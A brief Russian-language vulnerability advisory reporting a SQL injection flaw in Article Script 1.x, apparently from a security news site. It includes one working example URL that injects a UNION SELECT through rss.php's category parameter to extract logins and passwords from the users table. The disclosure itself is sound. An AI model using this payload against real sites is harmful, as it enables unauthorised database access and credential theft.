Программа: Article Script 1.x

Уязвимость позволяет злоумышленнику выполнить произвольный SQL код в базе данных приложения. Уязвимость существует из-за ошибки в обработке входных данных различными сценариями. Атакующий может выполнить произвольный SQL код в базе данных приложения.

Пример:

http://www.victim.com/articles/rss.php?category=-1/**/union/* */select/**/1,2,login,password/**/from/**/users/*

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии